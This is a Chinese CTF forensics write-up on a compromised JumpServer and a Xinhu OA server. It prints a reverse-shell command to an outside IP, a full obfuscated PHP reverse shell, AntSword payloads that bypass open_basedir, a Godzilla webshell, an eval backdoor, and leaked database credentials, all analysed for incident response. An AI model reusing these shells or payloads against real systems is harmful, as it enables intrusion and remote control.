2024“中华武数杯” 全国网络攻防精英赛
执着于web安全研究 发表于 湖北 CTF 356浏览 · 2024-11-30 11:10

场景2

弱密码登录

开始是一个jumpserver后台登录,尝试弱密码admin/admin123进入
注意不要爆破不然会被禁止30分钟

后门账户

在用户管理页面找到管理用户,发现有两个,其中一个是后门账户

黑客后门程序

查看进程和对应端口

ps -aux

找到进程执行反弹shell命令

bash -c bash -i >& /dev/tcp/181.32.44.99/9898 0>&1 &

或者看网络连接

netstat -anlupt

之后在tmp目录找到一个baidu.php后门,并将混淆代码的解码输出写到了注释里面

<?php
# Analyst note: goto-obfuscated PHP reverse shell recovered from /tmp (baidu.php).
# Line order is meaningless; execution follows the goto chain starting at xVmgn below.
# The two helpers used here (isHttpAlive, printit) are declared further down the file and
# are hoisted by PHP. Decoded forms of the escaped string literals are given in comments.
goto xVmgn;
fqEt0:
# The shell's three pipes (and later the socket) are made non-blocking for the select loop.
stream_set_blocking($pipes[0], 0);
goto InVPF;
IeHeL:
proc_close($process);
goto xV3Uc;
gXRc1:
# Relay loop: socket -> shell stdin, shell stdout/stderr -> socket, until either side hits EOF.
while (1) {
    if (feof($sock)) {
        # "ERROR: Shell connection terminated"
        printit("\x45\122\122\117\x52\x3a\x20\x53\x68\145\x6c\154\40\143\x6f\156\156\145\143\x74\x69\x6f\156\x20\x74\145\x72\155\151\x6e\141\x74\x65\144");
        break;
    }
    if (feof($pipes[1])) {
        # "ERROR: Shell process terminated"
        printit("\105\x52\122\x4f\x52\72\40\x53\x68\x65\x6c\x6c\x20\x70\x72\x6f\143\145\x73\x73\40\x74\145\x72\155\x69\x6e\141\x74\x65\144");
        break;
    }
    # Block (no timeout) until the socket, the shell's stdout or its stderr is readable.
    $read_a = array($sock, $pipes[1], $pipes[2]);
    $num_changed_sockets = stream_select($read_a, $write_a, $error_a, null);
    if (in_array($sock, $read_a)) {
        # $debug is hard-coded to 0 further down, so none of the printit() debug lines fire.
        if ($debug) {
            # "SOCK READ"
            printit("\x53\117\103\113\40\122\105\101\104");
        }
        $input = fread($sock, $chunk_size);
        if ($debug) {
            # "SOCK: {$input}"
            printit("\x53\x4f\x43\113\x3a\x20{$input}");
        }
        fwrite($pipes[0], $input);
    }
    if (in_array($pipes[1], $read_a)) {
        if ($debug) {
            # "STDOUT READ"
            printit("\x53\124\104\x4f\125\x54\40\122\105\x41\104");
        }
        $input = fread($pipes[1], $chunk_size);
        if ($debug) {
            # "STDOUT: {$input}"
            printit("\123\x54\x44\x4f\x55\124\x3a\x20{$input}");
        }
        fwrite($sock, $input);
    }
    if (in_array($pipes[2], $read_a)) {
        if ($debug) {
            # "STDERR READ"
            printit("\x53\x54\x44\x45\x52\x52\40\122\105\x41\104");
        }
        $input = fread($pipes[2], $chunk_size);
        if ($debug) {
            # "STDERR: {$input}"
            printit("\123\x54\x44\x45\x52\x52\x3a\x20{$input}");
        }
        fwrite($sock, $input);
    }
}
goto AZd0U;
rTceL:
# Daemonise if the pcntl extension is present: fork, let the parent exit, detach from the
# controlling terminal with setsid. Detection angle: a web-server worker forking a child
# that then holds an outbound TCP connection.
#pcntl_fork
if (function_exists("\160\x63\156\164\154\137\146\157\x72\x6b")) {
    $pid = pcntl_fork();
    if ($pid == -1) {
        #ERROR: Can't fork
        printit("\x45\x52\122\117\x52\72\40\103\x61\x6e\47\164\40\x66\x6f\x72\x6b");
        die(1);
    }
    if ($pid) {
        # Parent process exits; the child carries on as the daemon.
        die(0);
    }
    if (posix_setsid() == -1) {
        #Error: Can't setsid()
        printit("\x45\x72\x72\x6f\162\72\x20\103\141\x6e\47\164\x20\x73\x65\164\x73\151\x64\x28\51");
        die(1);
    }
    $daemon = 1;
} else { #WARNING: Failed to daemonise.  This is quite common and not fatal.
    printit("\x57\101\122\116\x49\116\x47\72\40\106\141\x69\154\x65\x64\x20\x74\157\40\x64\141\145\x6d\x6f\x6e\151\163\145\x2e\40\40\x54\150\x69\x73\40\x69\x73\x20\161\x75\x69\x74\145\x20\143\x6f\x6d\155\157\156\x20\141\x6e\144\40\x6e\x6f\164\x20\x66\x61\164\x61\x6c\x2e");
}
goto jmHuA;
RlaS8:
# "{$errstr} ({$errno})" — printed when the connect-back in fsockopen() failed.
if (!$sock) {
    printit("{$errstr}\x20\x28{$errno}\51");
    die(1);
}
goto Uge_Q;
InVPF:
stream_set_blocking($pipes[1], 0);
goto JANIF;
QHXRE: #Successfully opened reverse shell to {$ip}:{$port}
printit("\123\x75\143\143\x65\163\163\146\165\154\154\x79\40\157\160\x65\x6e\145\144\40\x72\x65\166\145\162\163\145\x20\163\x68\145\x6c\x6c\x20\164\157\40{$ip}\x3a{$port}");
goto gXRc1;
Zq8k_:
$error_a = null;
goto Wo4xn;
Wo4xn: #uname -a; w; id; bash -i
# Command handed to proc_open(): host fingerprint, then an interactive bash.
$shell = "\x75\x6e\x61\x6d\145\x20\x2d\x61\x3b\x20\167\x3b\x20\x69\x64\73\40\142\x61\163\150\x20\x2d\x69";
goto YKN_Y;
r30Sz:
fclose($pipes[1]);
goto O9FZs;
xVmgn:
# Entry point of the goto chain.
set_time_limit(0);
goto NGebl;
xcFTT: #ERROR: Can't spawn shell
if (!is_resource($process)) {
    printit("\x45\122\122\x4f\x52\72\x20\103\x61\x6e\x27\164\40\x73\160\141\x77\156\x20\163\x68\x65\x6c\x6c");
    die(1);
}
goto wkPUB;
qcImP: #181.32.44.99
# C2 address; matches the connect-back seen in the process list (see the bash -i line above).
$ip = "\x31\x38\x31\x2e\63\62\56\64\64\56\71\x39";
goto uNuVg;
YKN_Y:
$daemon = 0;
goto BzzaA;
JANIF:
stream_set_blocking($pipes[2], 0);
goto Di1ZG;
Uge_Q: #pipe r
# 0 => ["pipe","r"], 1 => ["pipe","w"], 2 => ["pipe","w"]: stdin/stdout/stderr of the shell.
$descriptorspec = array(0 => array("\x70\151\160\145", "\x72"), 1 => array("\160\x69\160\x65", "\x77"), 2 => array("\x70\x69\x70\145", "\167"));
goto PE2Nh;
wkPUB:
# Liveness gate: the script exits early (see the call further down) unless http://{$ip}
# answers within $timeout seconds with a status line containing "200". Warnings from
# get_headers() are suppressed with @. Note strpos() is tested for truthiness, so a "200"
# at offset 0 would count as absent — irrelevant for a normal "HTTP/1.x 200 ..." line.
function isHttpAlive($ip, $timeout = 2)
{ #http://
    $url = "\150\164\x74\160\x3a\x2f\57{$ip}";
    # array("http" => array("timeout" => $timeout))
    $context = stream_context_create(array("\150\x74\x74\x70" => array("\164\x69\155\145\x6f\x75\x74" => $timeout)));
    $headers = @get_headers($url, 0, $context);
    # "200"
    if ($headers && strpos($headers[0], "\x32\x30\60")) {
        return true;
    }
    return false;
}
goto fqEt0;
pRr2Z:
# Bytes read per fread() call in the relay loop.
$chunk_size = 1400;
goto dSZoi;
NhUwH:
fclose($pipes[0]);
goto r30Sz;
Di1ZG:
stream_set_blocking($sock, 0);
goto QHXRE;
DtngS:
# Daemon housekeeping after chdir("/").
umask(0);
goto xfXIP;
# Prints $string followed by "\12" (newline) unless running as a daemon.
# NOTE(review): $daemon is not imported with `global`, so inside this function it is an
# undefined (null) variable and the check is always true — messages are printed regardless.
function printit($string)
{
    if (!$daemon) {
        print "{$string}\12";
    }
}
goto AObOM;
AZd0U:
# Teardown after the relay loop ends: close the socket, then the shell's pipes and process.
fclose($sock);
goto NhUwH;
NGebl:
# "1.0"
$VERSION = "\x31\x2e\60";
goto qcImP;
O9FZs:
fclose($pipes[2]);
goto IeHeL;
uNuVg:
# C2 port; together with $ip this is the connect-back seen in netstat/ps output.
$port = 9898;
goto pRr2Z;
xfXIP:
# Outbound connection to the C2 with a 30 second connect timeout.
$sock = fsockopen($ip, $port, $errno, $errstr, 30);
goto RlaS8;
PE2Nh:
$process = proc_open($shell, $descriptorspec, $pipes);
goto xcFTT;
BzzaA:
$debug = 0;
goto FhswA;
dSZoi:
$write_a = null;
goto Zq8k_;
FhswA:
# Exit quietly unless the C2 host answers over HTTP (see isHttpAlive).
if (!isHttpAlive($ip)) {
    die(0);
}
goto rTceL;
jmHuA:
# "/"
chdir("\x2f");
goto DtngS;
AObOM:

场景一

Vulnerability-Wiki/docs-base/docs/oa/信呼OA-qcloudCosAction.php-任意文件上传漏洞.md at master · Threekiii/Vulnerability-Wiki
CVE-2023-1501

POST /index.php?a=upfile&m=upload&d=public&maxsize=100&ajaxbool=true&rnd=769871 HTTP/1.1


发现请求有代码传入,是CVE-2023-1773

http://39.101.137.133/?p=webmain&d=system&m=cog%7Ccog&ajaxbool=true&a=savecong

原文已经给了修改密码的步骤

后面寻找修改的密码

并且之后rce是将代码写入配置文件webmainConfig.php

流量中的木马命令

第一次传参的RCE代码可以看到如下

<?php
// Analyst note: AntSword PHP one-shot payload as captured in the first RCE request.
// Errors are hidden and the execution time limit removed before any work is done.
@ini_set("display_errors", "0");
@set_time_limit(0);
// open_basedir bypass: when a restriction is set, create a throwaway dot-directory, chdir()
// into it, shrink open_basedir to "..", walk up once per separator-delimited piece of the
// original value, then set open_basedir to "/" and remove the helper directory.
// Detection angle: mkdir/rmdir of a random dot-directory under the web root plus repeated
// ini_set("open_basedir") calls from a web worker.
$opdir = @ini_get("open_basedir");
if ($opdir) {
    $oparr = preg_split("/\\\\|\//", $opdir);
    $ocwd = dirname($_SERVER["SCRIPT_FILENAME"]);
    $tmdir = ".4fcb9f3038fe";
    @mkdir($tmdir);
    @chdir($tmdir);
    @ini_set("open_basedir", "..");
    for ($i = 0; $i < sizeof($oparr); $i++) {
        @chdir("..");
    }
    @ini_set("open_basedir", "/");
    @rmdir($ocwd . "/" . $tmdir);
};
// Output "encoder" hook: returns $out unchanged, i.e. the response body is sent in plain text.
function asenc($out)
{
    return $out;
};
// Flushes the buffered script output framed by two fixed markers ("c8654" ... "20a81404fc0")
// so the client can cut the result out of the HTTP response; the split literals are the
// usual AntSword signature-evasion trick.
function asoutput()
{
    $output = ob_get_contents();
    ob_end_clean();
    echo "c8" . "654";
    echo @asenc($output);
    echo "20a81" . "404fc0";
}
ob_start();
// Host fingerprint: script directory, drive letters C: to Z: that exist (Windows) or "/"
// (Unix), php_uname() and the effective user name; printed as one line, then framed by
// asoutput().
try {
    $D = dirname($_SERVER["SCRIPT_FILENAME"]);
    if ($D == "") $D = dirname($_SERVER["PATH_TRANSLATED"]);
    $R = "{$D}  ";
    if (substr($D, 0, 1) != "/") {
        foreach (range("C", "Z") as $L) if (is_dir("{$L}:")) $R .= "{$L}:";
    } else {
        $R .= "/";
    }
    $R .= " ";
    // Tests for posix_getegid but calls posix_geteuid/posix_getpwuid; falls back to
    // get_current_user() when the posix extension is absent.
    $u = (function_exists("posix_getegid")) ? @posix_getpwuid(@posix_geteuid()) : "";
    $s = ($u) ? $u["name"] : @get_current_user();
    $R .= php_uname();
    $R .= " {$s}";
    echo $R;;
} catch (Exception $e) {
    echo "ERROR://" . $e->getMessage();
};
asoutput();
die();

最终结果突破open_basedir的限制,获取到了当前目录的路径以及用户名和系统信息

第二个解密流量的命令代码如下

<?php
// Analyst note: second AntSword request from the traffic; same stub as the first one
// with a different helper directory name and different response markers.
@ini_set("display_errors", "0");
@set_time_limit(0);
// open_basedir bypass: throwaway dot-directory, chdir() into it, open_basedir = "..",
// one chdir("..") per separator-delimited piece of the original value, then open_basedir = "/".
$opdir = @ini_get("open_basedir");
if ($opdir) {
    $oparr = preg_split("/\\\\|\//", $opdir);
    $ocwd = dirname($_SERVER["SCRIPT_FILENAME"]);
    $tmdir = ".51d10df2";
    @mkdir($tmdir);
    @chdir($tmdir);
    @ini_set("open_basedir", "..");
    for ($i = 0; $i < sizeof($oparr); $i++) {
        @chdir("..");
    }
    @ini_set("open_basedir", "/");
    @rmdir($ocwd . "/" . $tmdir);
};
// Output "encoder" hook: identity, the response body is sent unencoded.
function asenc($out)
{
    return $out;
};
// Emits the buffered output between the markers "151b39961" and "a4e42039d" — exactly the
// prefix/suffix visible around the captured response in the traffic.
function asoutput()
{
    $output = ob_get_contents();
    ob_end_clean();
    echo "151b" . "39961";
    echo @asenc($output);
    echo "a4e4" . "2039d";
}
ob_start();
// Host fingerprint (script directory, existing drive letters or "/", php_uname(), effective
// user), then framed by asoutput(). The captured reply shows a Windows Server 2012 R2 host
// running as Administrator.
try {
    $D = dirname($_SERVER["SCRIPT_FILENAME"]);
    if ($D == "") $D = dirname($_SERVER["PATH_TRANSLATED"]);
    $R = "{$D}  ";
    if (substr($D, 0, 1) != "/") {
        foreach (range("C", "Z") as $L) if (is_dir("{$L}:")) $R .= "{$L}:";
    } else {
        $R .= "/";
    }
    $R .= " ";
    $u = (function_exists("posix_getegid")) ? @posix_getpwuid(@posix_geteuid()) : "";
    $s = ($u) ? $u["name"] : @get_current_user();
    $R .= php_uname();
    $R .= " {$s}";
    echo $R;;
} catch (Exception $e) {
    echo "ERROR://" . $e->getMessage();
};
asoutput();
die();

获取到了当前目录的位置以及windows主机名字和用户名
流量中响应结果

151b39961C:/phpstudy_pro/WWW\tC:\tWindows NT OA 6.3 build 9600 (Windows Server 2012 R2 Datacenter Edition) AMD64\tAdministratora4e42039d

第四次

<?php
// Analyst note: fourth AntSword request; same open_basedir stub, but the action below is a
// file write rather than a fingerprint.
@ini_set("display_errors", "0");
@set_time_limit(0);
// open_basedir bypass: throwaway dot-directory, chdir() into it, open_basedir = "..",
// one chdir("..") per separator-delimited piece of the original value, then open_basedir = "/".
$opdir = @ini_get("open_basedir");
if ($opdir) {
    $oparr = preg_split("/\\\\|\//", $opdir);
    $ocwd = dirname($_SERVER["SCRIPT_FILENAME"]);
    $tmdir = ".3ecc860f";
    @mkdir($tmdir);
    @chdir($tmdir);
    @ini_set("open_basedir", "..");
    for ($i = 0; $i < sizeof($oparr); $i++) {
        @chdir("..");
    }
    @ini_set("open_basedir", "/");
    @rmdir($ocwd . "/" . $tmdir);
};
// Output "encoder" hook: identity, the response body is sent unencoded.
function asenc($out)
{
    return $out;
};
// Emits the buffered output between the markers "c6088f362" and "ef2f47".
function asoutput()
{
    $output = ob_get_contents();
    ob_end_clean();
    echo "c608" . "8f362";
    echo @asenc($output);
    echo "ef2" . "f47";
}
ob_start();
// File drop: both POST fields carry base64 with a 2-character prefix stripped; the first is
// the target path (per the decoded parameters, C:/phpstudy_pro/WWW/upload/config.php) and
// the second the file body. The file is opened with "w" (truncate) and "1"/"0" reports
// whether fwrite() succeeded. The handle is never closed.
try {
    echo @fwrite(fopen(base64_decode(substr($_POST["c32fac3bd31b3"], 2)), "w"), base64_decode(substr($_POST["q96d98f37ce4ea"], 2))) ? "1" : "0";;
} catch (Exception $e) {
    echo "ERROR://" . $e->getMessage();
};
asoutput();
die();

传参的文件名如下,也就是把内容写入了config.php,根据后续访问可以知道是一个哥斯拉木马

C:/phpstudy_pro/WWW/upload/config.php ·
#Halo AntSword!

第五次上传了一个webshell,搜索发现是哥斯拉马
哥斯拉PHP马逐句解析 - 芥末炸弹 - 博客园

<?php 
// Analyst note: Godzilla PHP webshell stage, the content written to upload/config.php.
// Errors are silenced and a session is started because the decoded payload is cached in
// $_SESSION between requests (see the handler further down).
@session_start(); 
@set_time_limit(0); 
@error_reporting(0); 
// XOR "encode": byte $i of $D is XORed with $K[($i + 1) & 15] — `+` binds tighter than `&`,
// so the 16-character key is cycled starting at offset 1. XOR is its own inverse, so the
// same function both encrypts and decrypts.
function encode($D, $K){ 
    for ($i = 0; $i < strlen($D); $i++) { 
        $c = $K[$i + 1 & 15]; 
        $D[$i] = $D[$i] ^ $c; 
    } 
    return $D; 
} 

// POST field used as the shell password, the session slot for the cached payload, and the
// fixed XOR key (16 characters, see encode()).
$pass = 'pass123'; 
$payloadName = 'payload'; 
$key = '63064e0e3090705b'; 

if (isset($_POST[$pass])) { 
    // Every request body is base64-decoded and XOR-decoded with the fixed key.
    $data = encode(base64_decode($_POST[$pass]), $key); 

    if (isset($_SESSION[$payloadName])) { 
        // Later requests: decode the cached payload and eval() it. The eval'd code supplies
        // run(), which is not defined in this file and executes the decoded command in $data.
        $payload = encode($_SESSION[$payloadName], $key); 

        // encode() is an involution, so a second pass restores the raw session bytes;
        // NOTE(review): this only changes anything if the session value was stored unencoded.
        if (strpos($payload, "getBasicsInfo") === false) { 
            $payload = encode($payload, $key); 
        } 

        eval($payload); 
        // Response framing: the first 5 hex chars of md5(pass . key) are spliced into
        // "var Re<...>_config=" so the client can locate the encoded result inside the decoy
        // HTML. Detection angle: a response whose body is decoy markup around one base64 blob.
        $left = substr(md5($pass . $key), 0, 5); 
        $replacedString = str_replace("bdsek", $left, "var Rebdsek_config="); 
        header('Content-Type: text/html'); 
        echo '<!DOCTYPE html>'; 
        echo '<html lang="en">'; 
        echo $replacedString; 
        echo base64_encode(encode(@run($data),$key)); 
        echo ";"; 
        // NOTE(review): the tail of this literal is mis-decoded binary residue in the captured
        // copy; kept verbatim.
        echo 'document.getElementById("bdshell_js").src = "http://bdimg.share.baidu.com/static/js/shell_v2.js6················5·······························4(························s···········V6···r··`I··B·········X··· ······\· ·'; 
        echo '</body>'; 
        echo '</html>'; 
    } else { 
        // First request: only a body containing "getBasicsInfo" is accepted and stored
        // (XORed) in the session as the payload for subsequent requests.
        if (strpos($data, "getBasicsInfo") !== false) { 
            $_SESSION[$payloadName] = encode($data, $key); 
        } 
    } 
}

pass传入的是远控命令,通过攻击荷载中的run()方法执行远控命令。然后对回显进行加密后传输给哥斯拉的服务端。

D盾扫了一下,找到后门config.php,和上面流量分析的一致

隐藏后门为webmain\webmainConfig.php,也是流量中根据信呼OA的RCE漏洞写入配置文件的,与上面分析的一致

<?php
// Analyst note: Xinhu OA configuration file (webmain/webmainConfig.php) as recovered from the
// host. The application rewrites this file from the system-settings page between its own
// "//[" and "//]" markers; the eval($_POST[1]) line inside that region is the injected
// backdoor (written through the savecong RCE), while the returned array is the normal config.
// It still contains live credentials (db_pass, randkey, asynkey) that should be rotated.
if(!defined('HOST'))die('not access');
//[
eval($_POST[1]);//] saved via [System → System Tools → System Settings] on 2024-11-16 19:52:49 (config file modified)
return array(
    'url'   => '',  // system URL
    'localurl'  => '',  // local system URL, used for browsing on the server
    'title' => '信呼协同办公系统',  // default system title
    'apptitle'  => '信呼OA',  // title in the app and the mobile web version
    'db_host'   => '127.0.0.1', // database host
    'db_user'   => 'root',  // database user name
    'db_pass'   => 'CaQsC6zVR', // database password
    'db_base'   => 'xinhu', // database name
    'db_engine' => 'MyISAM',
    'perfix'    => 'xinhu_',    // table name prefix
    'qom'   => 'xinhu_',    // session / cookie prefix
    'highpass'  => '',  // super-admin password, can log in to any account
    'db_drive'  => 'mysqli',    // database driver: mysql, mysqli or pdo
    'randkey'   => 'pcywdgunofzqvsthbmxlraikje',    // system random-string key
    'asynkey'   => 'c57fa9c833f4a2c4e208261dddfc9926',  // key for asynchronous tasks
    'openkey'   => '',  // openkey for the external API
    'updir' => 'upload',
    'sqllog'    => false,   // whether to record SQL logs under upload/sqllog
    'asynsend'  => '',  // reminder dispatch: 0 synchronous, 1 async on own server, 2 async via official-site VIP
    'editpass'  => '',  // password change on login: 0 not required, 1 forced
    'install'   => true,    // installed flag, do not remove
    'xinhukey'  => '',  // Xinhu official-site key, used for online upgrades
    'outurl'    => '',  // address used to push messages to phones when the system is reached via an intranet address
    'reimtitle' => '',  // title shown in REIM instant messaging
    'qqmapkey'  => '',
    'platurl'   => '',
    'bcolorxiang'   => '',  // default line colour on the document detail page
    'officeyl'  => '',  // Excel/Doc preview: 0 self-hosted plugin, 1 official-site service (any platform)
    'useropt'   => '',  // 1 records user operations to the log, empty disables
    'defstype'  => '1', // PC back-office theme, 1 to 34
    'officebj'  => '',  // online document editing: 1 official-site provided or self-hosted
    'officebj_key'  => '',  // online document editing agent key
    'debug' => false,   // true = debug/development mode, false = production
    'reim_show' => false,   // show REIM on the home page
    'mobile_show'   => false,   // show the mobile version on the home page
    'companymode'   => false,   // multi-company mode, true enables it
    'loginyzm'  => '',  // login mode: 0 account+password only, 1 account+password or phone+code, 2 account+password+captcha, 3 phone+code only
    'apptheme'  => '',  // theme colour of the system / app

);